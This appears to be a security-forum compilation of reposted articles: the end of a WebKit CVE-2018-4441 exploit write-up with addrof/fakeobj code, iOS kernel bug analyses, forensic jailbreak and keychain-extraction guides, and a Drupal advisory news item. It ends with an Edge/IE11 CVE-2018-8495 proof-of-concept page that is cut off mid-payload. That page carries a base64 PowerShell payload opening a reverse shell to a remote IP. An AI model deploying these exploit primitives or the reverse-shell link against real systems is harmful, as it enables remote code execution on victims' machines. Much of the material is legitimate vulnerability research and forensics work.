For example, assuming Butterfly::tryCreateUninitialized returns spray[6], then you can think of [4] as: for (j = 0; j < startIndex; i++) spray[6][j] = spray[6][j+1]; This is how we’ll overwrite the length header field of the adjacent array’s butterfly, leading to an OOB and finally to a sweet addrof/fakeobj primitive. This is how the memory looks like right before [4]: ... +0x0000: 0x00000000badbeef0 <--- vector +0x0008: 0x0000000000000000 +0x0010: 0x00000000badbeef0 +0x0018: 0x00000000badbeef0 +0x0020: 0x00000000badbeef0 |vectlen| |publen| +0x0028: 0x0000000d0000000a ---------+ +0x0030: 0x0001000000000539 | +0x0038: 0x00007fffaf734dc0 | +0x0040: 0x00007fffaf734e00 | +0x0048: 0x00007fffaf734e40 | +0x0050: 0x00007fffaf734e80 spray[688] +0x0058: 0x00007fffaf734ec0 | +0x0060: 0x00007fffaf734f00 | +0x0068: 0x00007fffaf734f40 | +0x0070: 0x00007fffaf734f80 | +0x0078: 0x00007fffaf734fc0 ---------+ ... +0x0098: 0x0000000d0000000a ---------+ +0x00a0: 0x402abd70a3d70a3d | +0x00a8: 0x402abd70a3d70a3d | +0x00b0: 0x402abd70a3d70a3d | +0x00b8: 0x402abd70a3d70a3d | +0x00c0: 0x402abd70a3d70a3d spray[689] +0x00c8: 0x402abd70a3d70a3d | +0x00d0: 0x402abd70a3d70a3d | +0x00d8: 0x402abd70a3d70a3d | +0x00e0: 0x402abd70a3d70a3d | +0x00e8: 0x4085e2f5c28f5c29 ---------+ ... And here’s the aftermath. Pay close attention to spray[688]’s vectorLength and publicLength fields: ... +0x0020: 0x0000000d0000000a |vectlen| |publen| +0x0028: 0x0001000000000539 --------+ +0x0030: 0x00007fffaf734dc0 | +0x0038: 0x00007fffaf734e00 | +0x0040: 0x00007fffaf734e40 | +0x0048: 0x00007fffaf734e80 | +0x0050: 0x00007fffaf734ec0 spray[688] +0x0058: 0x00007fffaf734f00 | +0x0060: 0x00007fffaf734f40 | +0x0068: 0x00007fffaf734f80 | +0x0070: 0x00007fffaf734fc0 | +0x0078: 0x0000000000000000 --------+ ... We’ve successfully overwritten spray[688]’s length. It’s pretty much game over. 
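The length-field corruption can be reproduced with a toy Python model of the heap (all slot values below are hypothetical labels, not real JSC memory): a 10-slot butterfly vector followed by the adjacent array's IndexingHeader. The moveFront memmove at [4] shifts every slot one position towards the front, so the header slot ends up holding whatever lay one slot past it, which is how spray[688]'s vectorLength/publicLength pair got clobbered:

```python
# Toy heap: 10 vector slots, a scribble slot, the neighbour's length header,
# then slots further along that the oversized memmove also touches.
LENGTH_HEADER = "len=10"
heap = [f"elem{i}" for i in range(10)] + ["scribble", LENGTH_HEADER, "oob0", "oob1"]

# memmove(vector, vector + count, startIndex * sizeof(JSValue)) with count=1:
# copy startIndex slots backwards by one position, well past the allocation.
start_index, count = 12, 1
for j in range(start_index):
    heap[j] = heap[j + count]

print(heap[11])  # the header slot no longer holds "len=10"
```

In the real exploit startIndex is 1000, so the shift sweeps far beyond the 10-element butterfly, replacing the neighbouring header with attacker-influenced out-of-bounds data.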
addrof and fakeobj let oob_boxed = spray[688]; // ArrayWithContiguous let oob_unboxed = spray[689]; // ArrayWithDouble let stage1 = { addrof: function(obj) { oob_boxed[14] = obj; return f2i(oob_unboxed[0]); }, fakeobj: function(addr) { oob_unboxed[0] = i2f(addr); return oob_boxed[14]; }, test: function() { var addr = this.addrof({a: 0x1337}); var x = this.fakeobj(addr); if (x.a != 0x1337) { fail(1); } print('[+] Got addrof and fakeobj primitives \\o/'); } } We’ll use oob_boxed, whose length we overwrote, to write an object’s address inside oob_unboxed, in order to construct our addrof primitive and lastly use oob_unboxed to place arbitrary addresses in it and be able to interpret them as objects via oob_boxed. The rest of the exploit is plug n’ play code used in almost every exploit; Spraying structures and using named properties for arbitrary read/write. w00dl3cs has done a great job explaining that part here so we’ll leave it at that. Conclusion CVE-2018-4441 was fixed in commit 51a62eb53815863a1bd2dd946d12f383e8695db0. We’ll release our exploit shortly after we clean it up a bit. If you have any questions/suggestions, feel free to contact us on twitter. References Attacking JavaScript Engines instanceof exploit write-up by w00dl3cs array overflow exploit by niklasb Sursa: https://melligra.fun/webkit/2019/02/15/cve-2018-4441/
15. iOS kernel.backtrace Information Leak Vulnerability

Posted: 2019-02-22 09:00 by Stefan Esser

Intro

In our iOS Kernel Internals for Security Researchers training at offensive_con we let our trainees look at some code that Apple introduced to the kernel in iOS 10. This code implements a new sysctl handler for the kernel.backtrace sysctl. This sysctl is meant to retrieve the current thread's user level backtrace. The idea behind this exercise is to see if the trainees can spot a 0-day information leak vulnerability in the iOS kernel if they are already pointed in the right direction.

kernel.backtrace

The kernel.backtrace sysctl is a relatively new addition to the iOS kernel that lets the current process retrieve its own user level backtrace. While the logic for determining the user level backtrace is buried somewhere in the Mach part of the kernel source code, the sysctl handler itself is implemented in the file /bsd/kern/kern_backtrace.c. The code for the handler is shown below.

48 static int
49 backtrace_sysctl SYSCTL_HANDLER_ARGS
50 {
51 #pragma unused(oidp, arg2)
52     uintptr_t *bt;
53     uint32_t bt_len, bt_filled;
54     uintptr_t type = (uintptr_t)arg1;
55     bool user_64;
56     int err = 0;
57
58     if (type != BACKTRACE_USER) {
59         return EINVAL;
60     }
61
62     if (req->oldptr == USER_ADDR_NULL || req->oldlen == 0) {
63         return EFAULT;
64     }
65
66     bt_len = req->oldlen > MAX_BACKTRACE ? MAX_BACKTRACE : req->oldlen;
67     bt = kalloc(sizeof(uintptr_t) * bt_len);
68     if (!bt) {
69         return ENOBUFS;
70     }
71
72     err = backtrace_user(bt, bt_len, &bt_filled, &user_64);
73     if (err) {
74         goto out;
75     }
76
77     err = copyout(bt, req->oldptr, bt_filled * sizeof(uint64_t));
78     if (err) {
79         goto out;
80     }
81     req->oldidx = bt_filled;
82
83 out:
84     kfree(bt, sizeof(uintptr_t) * bt_len);
85     return err;
86 }

The code above will first validate the incoming arguments and limit the depth of the backtrace that can be retrieved (lines 58-66).
It will then allocate a heap buffer to store a backtrace of the user-selected depth in line 67 and use an external helper function to fill the buffer with the user level backtrace (line 72). The retrieved backtrace is then copied to user land (line 77) and the heap buffer is released (line 84).

The Vulnerability

Before reading on further I suggest that you take a look at the code above again and try to spot the vulnerability yourself without help. Only one hint should be given: the vulnerability can only be exploited on older iOS/watchOS/tvOS devices.

Please do not read further before you have given yourself a chance to spot the vulnerability.

I am serious! Please try to first spot the vulnerability yourself.

The fact that you are reading this means you either ignored the three warnings above, or you have already looked at the code yourself and either spotted the vulnerability or given up after a reasonable amount of time. So let us figure out the problem together. Let us have a look at the line that copies the backtrace to user land.

77     err = copyout(bt, req->oldptr, bt_filled * sizeof(uint64_t));
78     if (err) {
79         goto out;
80     }

As you can see, the number of bytes copied to user land is bt_filled * sizeof(uint64_t). This is the number of filled out backtrace entries times 8 bytes. And now let us have a look at how big the heap buffer is that we are dealing with.

67     bt = kalloc(sizeof(uintptr_t) * bt_len);
68     if (!bt) {
69         return ENOBUFS;
70     }

We can see here that the size of the heap buffer is determined by the formula sizeof(uintptr_t) * bt_len. This is the maximum number of retrieved backtrace entries times the size of a pointer. And this is where our previous hint kicks in: the size of a pointer is only 8 on recent devices. Older iOS devices (iPhone 5c and below) and older Apple Watches (Series 3) are internally 32 bit devices and therefore have only 4 byte pointers.
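The mismatch can be condensed into a few lines of Python (a sketch; the real sizes come from the C sizeof operator): the allocation scales with the platform pointer size while the copyout always uses 8-byte entries, so on a 4-byte-pointer kernel the copy covers twice the buffer.

```python
def kalloc_vs_copyout(bt_entries, pointer_size):
    # kalloc(sizeof(uintptr_t) * bt_len) -- pointer-sized entries
    alloc_size = pointer_size * bt_entries
    # copyout(bt, req->oldptr, bt_filled * sizeof(uint64_t)) -- always 8 bytes,
    # assuming the backtrace fills the whole buffer (bt_filled == bt_len)
    copy_size = 8 * bt_entries
    return alloc_size, copy_size

print(kalloc_vs_copyout(64, 8))  # 64-bit kernel: (512, 512), sizes agree
print(kalloc_vs_copyout(64, 4))  # 32-bit kernel: (256, 512), 256-byte overread
```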
This means that on these older devices the call to copyout() will copy twice as many bytes from the heap as the buffer actually holds. This is a classic heap buffer over-read vulnerability.

The Impact

As pointed out, this is a 0-day kernel information leak vulnerability that has not been shared with Apple before now and is therefore still unfixed in the kernel. However, there are a number of mitigating factors:

- the vulnerability affects only 32 bit iOS devices - the only 32 bit devices Apple still supports in current releases are Apple Watch Series 3 and below
- the vulnerability can only be triggered outside of the app sandbox - so it can only be used as part of a vulnerability chain and not exploited directly from an app

iOS 12 copyin/copyout Mitigation

Starting with iOS 12, Apple has added a mitigation to the kernel that checks, whenever copyin() or copyout() is executed, whether the kernel's heap buffer has the necessary size for the operation to continue. The kernel will panic if an attacker tries to read or write across the boundary of a kernel zone heap element. However, this mitigation does not stop an attacker from exploiting this vulnerability because Apple did not add this protection to 32 bit kernels. It is unknown if they simply forgot to protect their remaining 32 bit devices or if they simply do not care about them at all anymore.

The Apple Security Bounty

The value of this security vulnerability in the eyes of Apple's security bounty program is exactly 0 USD. There are three reasons for this:

- Apple only pays for vulnerabilities affecting the latest of their devices. It doesn't matter if they officially still support older devices by providing them updates. They will only pay if the bugs affect recent devices.
- Apple does not pay for vulnerabilities that affect macOS / tvOS / watchOS. Only if iOS devices are affected might they pay.
- Apple does not pay for information leak vulnerabilities, although many of their mitigations rely on kernel memory being kept confidential.

Conclusion

This vulnerability is one of those things that are hard to explain. It is in relatively new code, so we would assume that kernel developers these days would be careful when writing new code. It is therefore rather a mystery why two different data types are used for the allocation and for copying the data. It is furthermore hard to explain why a security review of the new kernel code, which should happen every time new code is added, did not spot this. The use of two different data types for allocation and copying is pretty obvious, and trainees at offensive_con who were just learning about the kernel were pretty fast in seeing the problem.

Trainings

If you are interested in this kind of content please consider signing up for one of our upcoming trainings.

Stefan Esser

Sursa: https://www.antid0te.com/blog/19-02-22-ios-kernel-backtrace-information-leak-vulnerability.html
16. Is CVE-2019-7287 hidden in ProvInfoIOKitUserClient?

Posted: 2019-02-24 00:00 by Stefan Esser | More posts about Blog iOS Kernel CVE-2019-7287 ProvInfoIOKitUserClient ProvInfoIOKit Vulnerability

Intro

On February 8th 2019 Apple released the iOS 12.1.4 update that fixed a previously disclosed security vulnerability in FaceTime group conferences that was heavily discussed in the media the week before. However, with the same update Apple fixed a number of other vulnerabilities, as documented in the usual place. While it is not uncommon for Apple to fix multiple security problems with the same update, a tweet from Google's Project Zero made the public aware that two of these vulnerabilities were apparently found being exploited in the wild. Since then more than two weeks have passed and neither Google nor Apple have given out any details about this incident, which leaves the rest of the world in the dark about what exactly happened, how Google was able to catch a chain of iOS 0-day vulnerabilities in the wild and where exactly the vulnerabilities are located. As usual, Apple's security notes contain only very brief descriptions of what was fixed. So it is no surprise that all they disclose about these vulnerabilities is the following.

Foundation

Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation
Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved input validation.
CVE-2019-7286: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero

IOKit

Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed with improved input validation.
CVE-2019-7287: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero

This information is very unsatisfying and therefore we decided to have a look into what was actually fixed. Because we usually concentrate on the iOS kernel, we tried to figure out what vulnerability is hiding behind CVE-2019-7287 by binary diffing the iOS 12.1.3 and the iOS 12.1.4 kernels.

Patch Analysis

Analysing iOS security patches has become a lot easier since the last time iOS malware was caught in the wild. With the release of iOS 10, Apple started to ship the iOS kernel in the firmware in decrypted form to be more open. But then they recently decided with iOS 12 to backpedal on this openness by stripping all symbols from the shipped kernels. However, due to a mistake they shipped a fully symbolized iOS 12 kernel during the development stages, which was immediately uploaded to Hex-Rays' Lumina service. Without symbols, analysing patches becomes a bit more difficult; in this case, however, the functions in question even have strings in them that point to the problem directly. Once you have extracted the two kernels from the firmware, they can be analysed for differences. We have used the open source binary diffing plugin Diaphora for IDA to perform this task. For our comparison we loaded the iOS 12.1.3 kernel into IDA, waited for the autoanalysis to finish and then used Diaphora to dump the current IDA database into the SQLite database format Diaphora uses. We repeated this process with the iOS 12.1.4 kernel and then told Diaphora to diff the two databases overnight using its slow heuristics. The result of this comparison showed only a very small number of partially changed functions. When looking at these functions we believe the vulnerability is likely in the function ProvInfoIOKitUserClient::ucGetEncryptedSeedSegment.
The reason we believe this is that Apple introduced a new size check in this function. Have a look at the previous version of the function. And now have a look at the fixed version in iOS 12.1.4. You can clearly see the newly introduced size check in the area marked in red, with a clear error message attached to it.

ProvInfoIOKitUserClient

The IOKit objects ProvInfoIOKit and ProvInfoIOKitUserClient are implemented in a driver called com.apple.driver.ProvInfoIOKit. Connections to this driver cannot be created from the normal container sandbox that iOS applications run in. This means there is likely a sandbox escape involved in the full iOS exploitation chain that Google found. Alternatively, the exploit chain could exploit one of the daemons that have legitimate access to this driver. A check of the sandbox profiles shipped with iOS 12 reveals that there are three daemon sandboxes that are allowed to access this driver. These daemon sandboxes are:

findmydeviced
mobileactivationd
identityserviced

Which route to this driver was taken by the original attackers we can only guess until Apple or Google finally decide to reveal this information to the public. All this assumes that our guess is right and the newly introduced size check is actually the fix for CVE-2019-7287. Having pinpointed the newly introduced size check in ProvInfoIOKitUserClient::ucGetEncryptedSeedSegment, the next step is to find out how this function can actually be called from the outside. As it turns out, this function is directly exposed to userland via the externalMethod interface of the driver. A check of ProvInfoIOKitUserClient::getTargetAndMethodForIndex reveals that the driver offers 6 different external methods to userland.
These methods are:

ucGenerateSeed (obfuscated name: fpXqy2dxjQo7)
ucGenerateInFieldSeed (obfuscated name: afpHseTGo8s)
ucExchangeWithHoover (obfuscated name: AEWpRs)
ucGetEncryptedSeedSegment
ucEncryptSUInfo
ucEncryptWithWrapperKey

The interesting thing here is that the first three external methods have obfuscated names in the leaked symbols. However, all six routines have very explicit strings in them that reveal their names. Checking into the other external methods, we were in for a surprise.

The Surprise

When looking into ucEncryptSUInfo and ucEncryptWithWrapperKey we were surprised to see that both these functions have also been changed. Both have also gotten new size checks. And both these functions did not show up in our Diaphora output. At some point we may want to go back and try to figure out why Diaphora did not see these functions as changed (or maybe they changed too much, so that the different functions were not matched). When you look at these functions and the introduced size checks you will also see that directly after the size check there are calls to memmove. When you look at the calls to memmove, it seems that before the size checks were introduced the code fully trusted user-supplied size fields in the incoming parameter structure. This likely led to arbitrarily sized heap memory corruptions. We will look into this in the next few days to verify this educated guess.

To be continued

Our research and therefore this blog post is far from finished. We only wanted to get this information out as soon as possible in order to first verify that we have pinpointed the right location before we invest further resources into maybe chasing down the wrong bug. Please check back in a few days to see if we have updated this post.

Trainings

If you are interested in this kind of content please consider signing up for one of our upcoming trainings.

Stefan Esser

Sursa: https://www.antid0te.com/blog/19-02-23-ios-kernel-cve-2019-7287-memory-corruption-vulnerability.html
17. iOS 12 Rootless Jailbreak

The new generation of jailbreaks has arrived. Available for iOS 11 and iOS 12 (up to and including iOS 12.1.2), rootless jailbreaks offer significantly more forensically sound extraction compared to traditional jailbreaks. Learn how rootless jailbreaks differ from classic jailbreaks, why they are better for forensic extractions and what traces they leave behind.

Privilege Escalation

If you follow our blog, you might have already seen articles on iOS jailbreaking. In case you didn't, here are a few recent ones to get you started:

Physical Extraction and File System Imaging of iOS 12 Devices
Using iOS 11.2-11.3.1 Electra Jailbreak for iPhone Physical Acquisition
iPhone Physical Acquisition: iOS 11.4 and 11.4.1

In addition, we published an article on the technical and legal implications of iOS file system acquisition that's totally worth reading. Starting with the iPhone 5s, Apple's first iOS device featuring a 64-bit SoC and Secure Enclave to protect device data, the term "physical acquisition" has changed its meaning. In earlier (32-bit) devices, physical acquisition used to mean creating a bit-precise image of the user's encrypted data partition. By extracting the encryption key, the tool performing physical acquisition was able to decrypt the content of the data partition. Secure Enclave locked us out. For 64-bit iOS devices, physical acquisition means file system imaging, a higher-level process compared to acquiring the data partition. In addition, the iOS keychain can be obtained and extracted during the acquisition process. Low-level access to the file system requires elevated privileges. Depending on which tool or service you use, privilege escalation can be performed by directly exploiting a vulnerability in iOS to bypass the system's security measures. This is what tools such as GrayKey and services such as Cellebrite do. If you go this route, you have no control over which exploit is used.
You won't know exactly which data is being altered on the device during the extraction, and what kind of traces are left behind post extraction. In iOS Forensic Toolkit, we rely on public jailbreaks to circumvent iOS security measures. The use of public jailbreaks as opposed to closed-source exploits has its benefits and drawbacks. The obvious benefit is the lower cost of the entire solution and the fact that you can choose the jailbreak to use. On the other hand, classic jailbreaks were leaving far too many traces, making them a bit of an overkill for the purpose of file system imaging. A classic jailbreak has to disable signature checks to allow running unsigned code. A classic jailbreak would include Cydia, a third-party app store that requires additional layers of development to work on jailbroken devices. In other words, classic jailbreaks such as Electra, Meridian or unc0ver carry too many extras that aren't needed or wanted in the forensic world. There is another issue with classic jailbreaks. In order to gain superuser privileges, these jailbreaks remount the file system and modify the system partition. Even after you remove the jailbreak post extraction, the device you were investigating will never be the same. It may or may not take OTA iOS updates, and it may (and often will) become unstable in operation. A full system restore through iTunes followed by a factory reset is often required to bring the device back to normal.

Rootless Jailbreak Explained

With classic jailbreaks being what they are, we actively searched for a different solution. That was the moment the rootless jailbreak arrived. Rootless jailbreaks have a significantly smaller footprint compared to classic ones. While offering everything required for file system extraction (including an SSH shell), they don't bundle unwanted extras such as the Cydia store.
Most importantly, rootless jailbreaks do not alter the content of the system partition, which makes it possible for the expert to remove the jailbreak and return the system to a clean pre-jailbroken state. All this makes using rootless jailbreaks a significantly more forensically sound procedure compared to using classic jailbreaks. So how exactly is a rootless jailbreak different from a full-root jailbreak? Let's take a closer look.

What is a regular jailbreak? A common definition of jailbreak is "privilege escalation for the purpose of removing software restrictions imposed by Apple". In addition, "jailbreaking permits root access." Root access means being able to read (and write) to the root of the file system. A full jailbreak grants access to "/" in order to give the user the ability to run unsigned software packages while bypassing Apple restrictions. Giving access to the root of the file system requires a file system remount. The jailbreak would then write some files to the system partition, thus modifying the device and effectively breaking OTA functionality. Why do classic jailbreaks need to write anything onto the system partition? The thing is, kppless jailbreaks cannot execute binaries in the user partition. Such attempts fail with "Operation not permitted". Obviously, apps installed from the App Store are located on the user partition and can run without a problem; the problem is getting unsigned binaries to run. The lazy way of achieving this task was putting binaries onto the system partition and going from there.

What is a rootless jailbreak then? "Rootless doesn't mean without root, it means without ability to write in the root partition" (redmondpie). Just as the name implies, a rootless jailbreak does not grant access to the root of the file system ("/"). The lowest level to which access is provided is the /var directory. This is considered to be a lot safer as nothing can modify or change system files to cause irreparable damage.

Is It Safe?
This is a valid question we've been asked a lot. If you read the Physical Extraction and File System Imaging of iOS 12 Devices article, you could see that installing the rootless jailbreak involves using a third-party Web site. Exposing an iPhone being investigated to Internet connectivity can be risky, especially if you don't have the authority to make Apple block all remote lock/remote wipe requests originated via the Find My iPhone service. We are currently researching the possibility of installing the jailbreak offline. If you need full transparency and accountability, you can compile your own IPA file from source code: https://github.com/jakeajames/rootlessJB3

You will then have to sign the IPA file and sideload it onto the iOS device you're about to extract, at which point the device will still have to verify the validity of the certificate by connecting to an Apple server. More information about the development of the rootless jailbreak can be found in the following write-up: How to make a jailbreak without a filesystem remount as r/w

Rootless Jailbreak: Modified Data and Life Post Extraction

The rootless jailbreak is available in source code. Because of this, one can analyze exactly what data is altered on the device. Knowing what is modified, experts can include this information in their reports. At the very least, rootlessJB modifies the following data on the device:

/var/containers/Bundle/Application/rootlessJB – the jailbreak itself
/var/containers/Bundle/iosbinpack64 – additional binaries and utilities
/var/containers/Bundle/iosbinpack64/LaunchDaemons – launch daemons
/var/containers/Bundle/tweaksupport – filesystem simulation where tweaks and stuff get installed

Symlinks include: /var/LIB, /var/ulb, /var/bin, /var/sbin, /var/Apps, /var/libexec

In addition, we expect to see some traces in various system logs. This is unavoidable with any extraction method, with or without a jailbreak.
The only way to completely avoid traces in iOS system logs would be imaging the device through DFU mode or its likes, followed by the decryption of the data partition (which is not possible on any modern iOS device).

Conclusion

The rootless jailbreak is the foundation that allows us to image the file system on Apple devices running all versions of iOS from iOS 12.0 to 12.1.2. In essence, rootless jailbreaks have everything that forensic experts need, and bundle none of the unwanted stuff included with full jailbreaks. The rootless jailbreak grants access to /var instead of /, which makes it safer and easier to remove without long-lasting consequences. While not fully forensically sound, a rootless jailbreak is much closer to offering a clean extraction compared to classic "full jailbreaks".

Sursa: https://blog.elcomsoft.com/2019/02/ios-12-rootless-jailbreak/
18. Physical Extraction and File System Imaging of iOS 12 Devices

February 21st, 2019 by Oleg Afonin

The new generation of jailbreaks has arrived for iPhones and iPads running iOS 12. Rootless jailbreaks offer experts the same low-level access to the file system as classic jailbreaks – but without their drawbacks. We've been closely watching the development of rootless jailbreaks, and developed full physical acquisition support (including keychain decryption) for Apple devices running iOS 12.0 through 12.1.2. Learn how to install a rootless jailbreak and how to perform physical extraction with Elcomsoft iOS Forensic Toolkit.

Jailbreaking and File System Extraction

We've published numerous articles on iOS jailbreaks and their connection to physical acquisition. Elcomsoft iOS Forensic Toolkit relies on public jailbreaks to gain access to the device's file system, circumvent iOS security measures and access device secrets, allowing us to decrypt the entire content of the keychain, including keychain items protected with the highest protection class. If you're interested in jailbreaking, read our article on using the iOS 11.2-11.3.1 Electra jailbreak for iPhone physical acquisition.

The Rootless Jailbreak

While iOS Forensic Toolkit does rely on public jailbreaks to circumvent the many security layers in iOS, it does not need or use those parts of them that jailbreak developers spend most of their efforts on. A classic jailbreak takes many steps that are needed to allow running third-party software and installing the Cydia store, which are not required for physical extraction. Classic jailbreaks also remount the file system to gain access to the root of the file system, which again is not necessary for physical acquisition. For iOS 12 devices, the Toolkit makes use of a different class of jailbreaks: the rootless jailbreak. A rootless jailbreak has a significantly smaller footprint compared to traditional jailbreaks since it does not use or bundle the Cydia store.
Unlike traditional jailbreaks, a rootless jailbreak does not remount the file system. Most importantly, a rootless jailbreak does not alter the content of the system partition, which makes it possible for the expert to remove the jailbreak after the acquisition without requiring a system restore to return the system partition to its original unmodified state. All this makes using rootless jailbreaks a significantly more forensically sound procedure compared to using classic jailbreaks.

Note: Physical acquisition of iOS 11 devices makes use of a classic (not rootless) jailbreak. More information: physical acquisition of iOS 11.4 and 11.4.1

Steps to Install rootlessJB

If you read our previous articles on jailbreaking and physical acquisition, you've become accustomed to the process of installing a jailbreak with Cydia Impactor. However, at this time there is no ready-made IPA file to install a rootless jailbreak in this manner. Instead, you can either compile the IPA from the source code (https://github.com/jakeajames/rootlessJB3) or follow the much simpler procedure of sideloading the jailbreak from a Web site. To install rootlessJB, perform the following steps.

Note: rootlessJB currently supports iPhone 6s, SE, 7, 7 Plus, 8, 8 Plus and iPhone X. Support for iPhone 5s and 6 has been added but is still unstable. Support for iPhone Xr, Xs and Xs Max is expected and in development.

1. On the iOS device you're about to jailbreak, open ignition.fun in Safari.
2. Select rootlessJB by Jake James. Click Get. The jailbreak IPA will be sideloaded to your device.
3. Open the Settings app and trust the newly installed Enterprise or Developer certificate. Note: a passcode (if configured) is required to trust the certificate.
4. Tap rootlessJB to launch the app. Leave the iSuperSU and Tweaks options unchecked and tap the "Jailbreak" button.

You now have unrestricted access to the file system.
Imaging the File System

In order to extract data from an Apple device running iOS 12, you will need iOS Forensic Toolkit 5.0 or newer. You must install a jailbreak prior to extraction.

1. Launch iOS Forensic Toolkit by invoking the "Toolkit-JB" command.
2. Connect the iPhone to the computer using the Lightning cable. If you are able to unlock the iPhone, pair the device by confirming the "Trust this computer?" prompt and entering the device passcode. If you cannot perform the pairing, you will be unable to perform physical acquisition.
3. You will be prompted to specify the SSH port number. By default, the port number 22 can be specified by simply pressing Enter.
4. From the main window, enter the "D" (DISABLE LOCK) command. This is required in order to access protected parts of the file system.
5. From the main window, enter the "F" (FILE SYSTEM) command. You will be prompted to enter the root password. By default, the root password is 'alpine'. You may need to enter the password several times.
6. The file system image will be dumped as a single TAR archive. Wait while the file system is being extracted. This can be a lengthy process.
7. When the process is finished, disconnect the device and proceed to analyzing the data.

Decrypting the Keychain

Physical acquisition is the only method that allows decrypting all keychain items regardless of their protection class. In order to extract (and decrypt) the keychain, perform the following steps (assuming that you have successfully paired and jailbroken the device).

1. Launch iOS Forensic Toolkit by invoking the "Toolkit-JB" command.
2. Connect the iPhone to the computer and specify the SSH port number (as described above). You will be prompted to enter the root password. By default, the root password is 'alpine'. You may need to enter the password several times.
3. From the main window, enter the "D" (DISABLE LOCK) command. This is required in order to access protected parts of the file system.
4. Now enter the "K" (KEYCHAIN) command.
5. You will be prompted for a path to save the keychain XML file.
6. Specify the iOS version (obviously, the second option). Enter 'alpine' when prompted for a password.
7. The content of the keychain will be extracted and decrypted.
8. When the process is finished, disconnect the device and proceed to analyzing the data.

Note: if you see an error message asking to unlock the device, unlock the iPhone and make sure to use the "D" command to disable screen lock.

Analyzing the Data

You can use Elcomsoft Phone Viewer to analyze the TAR file. In order to view the content of the keychain, you'll need Elcomsoft Phone Breaker.

Sursa: https://blog.elcomsoft.com/2019/02/physical-extraction-and-file-system-imaging-of-ios-12-devices/
19. That's a good question, and it is difficult to answer. It depends on many things:

1. What kind of terms and conditions they have
2. The legislation that applies
3. The country where the server on which the WordPress theme will appear is located
4. How the parties involved react

...
20. Hi. Alfa. But I don't know where you could get it from.
21. Another Critical Flaw in Drupal Discovered — Update Your Site ASAP!

February 21, 2019 Wang Wei

Developers of Drupal—a popular open-source content management system that powers millions of websites—have released the latest version of their software to patch a critical vulnerability that could allow remote attackers to hack your site. The update came two days after the Drupal security team released an advance security notification of the upcoming patches, giving website administrators an early heads-up to fix their websites before hackers abuse the loophole. The vulnerability in question is a critical remote code execution (RCE) flaw in Drupal Core that could "lead to arbitrary PHP code execution in some cases," the Drupal security team said. While the Drupal team hasn't released any technical details of the vulnerability (CVE-2019-6340), it mentioned that the flaw exists because some field types do not properly sanitize data from non-form sources, and that it affects Drupal 7 and 8 Core. It should also be noted that your Drupal-based website is only affected if the RESTful Web Services (rest) module is enabled and allows PATCH or POST requests, or if it has another web services module enabled. If you can't immediately install the latest update, then you can mitigate the vulnerability by simply disabling all web services modules, or configuring your web server(s) to not allow PUT/PATCH/POST requests to web services resources.

"Note that web services resources may be available on multiple paths depending on the configuration of your server(s)," Drupal warns in its security advisory published Wednesday. "For Drupal 7, resources are for example typically available via paths (clean URLs) and via arguments to the "q" query argument. For Drupal 8, paths may still function when prefixed with index.php/."
However, considering the popularity of Drupal exploits among hackers, you are highly recommended to install the latest update:

If you are using Drupal 8.6.x, upgrade your website to Drupal 8.6.10.
If you are using Drupal 8.5.x or earlier, upgrade your website to Drupal 8.5.11.

Drupal also said that the Drupal 7 Services module itself does not require an update at this moment, but users should still consider applying other contributed updates associated with the latest advisory if "Services" is in use. Drupal has credited Samuel Mortenson of its security team for discovering and reporting the vulnerability.

Sursa: https://thehackernews.com/2019/02/hacking-drupal-vulnerability.html?m=1
  22. <!doctype html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=10"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Cache" content="no-cache"> </head> <body> <b>Windows Edge/IE 11 - RCE (CVE-2018-8495)</b> </br></br> <!-- adapt payload since this one connectback on an internal IP address (just a private VM nothing else sorry ;) ) --> <a id="q" href='wshfile:test/../../system32/SyncAppvPublishingServer.vbs" test test;powershell -nop -executionpolicy bypass -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADUANgAuADEAIgAsADgAMAApADsAJABzAHQAcgBlAGEAbQAg AD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEA ZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4 AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMA dAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0 